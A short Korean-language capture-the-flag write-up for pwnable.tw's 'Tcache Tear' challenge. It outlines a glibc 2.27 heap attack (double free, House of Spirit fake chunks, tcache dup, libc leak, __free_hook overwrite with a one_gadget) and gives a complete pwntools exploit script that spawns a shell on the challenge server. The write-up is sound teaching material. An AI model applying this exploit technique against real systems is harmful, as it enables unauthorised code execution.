[pwnable.tw]Tcache Tear

• tcache exploit (glibc 2.27 Ubuntu 18.04)
• DFB & House of Spirit
• tcache dup
• bss fake chunk

너무 재밌게 풀었다. house of spirit을 이용해 fake chunk를 구성해서 ptr을 변경시키고 free 시켜서 unsorted bin을 leak할 수 있었다. 그 전에 free할 때 다음 청크도 검사하기 때문에 name + 0x500 위치에 또 다른 fake chunk를 만들어주었다. 그 이후로는 tcache dup해주면 되는데 __free_hook을 one_gadget으로 덮어줬다.

exploit.py

from pwn import *

# context.log_level = 'debug'
e = ELF('./tcache_tear')
libc = e.libc
# p = process('./tcache_tear')
p = remote('chall.pwnable.tw',10207)
ru = p.recvuntil
sa = p.sendafter
sla = p.sendlineafter
name = 0x0000000000602050
ptr = 0x0000000000602088 # void *ptr
fake = 0x602550 # name + 0x500

def malloc(size,data):
	sa('Your choice :','1')
	sa('Size:',str(size))
	sa('Data',data)

def free():
	sa('Your choice :','2')

def info():
	sa('Your choice :','3')

def quit():
	sa('Your choice :','4')

sa('Name:','A')

malloc(0x80,'A'*8)
free()
free()
malloc(0x80,p64(fake))
malloc(0x80,'B'*8)
fakechunk1 = p64(0) + p64(0x21) + p64(0) * 3 + p64(0x21)
malloc(0x80,fakechunk1)

malloc(0x70,'C'*8)
free()
free()
malloc(0x70,p64(name))
malloc(0x70,'D'*8)
fakechunk2 = p64(0) + p64(0x501) + p64(0) * 5 + p64(name + 0x10)
malloc(0x70,fakechunk2)

free()

info()
libc_base = u64(ru('\x7f')[-6:].ljust(8,'\x00')) - 0x3ebca0
log.info('libc_base : {}'.format(hex(libc_base)))
free_hook = libc_base + libc.symbols['__free_hook']
log.info('__free_hook : {}'.format(hex(free_hook)))
oneshot = libc_base + 0x4f322 # 0x4f2c5 0x4f322 0x10a38c

malloc(0x60,'E'*8)
free()
free()
malloc(0x60,p64(free_hook))
malloc(0x60,p64(0))
malloc(0x60,p64(oneshot))

free()

p.interactive()

Reference

https://github.com/shellphish/how2heap/tree/master/glibc_2.26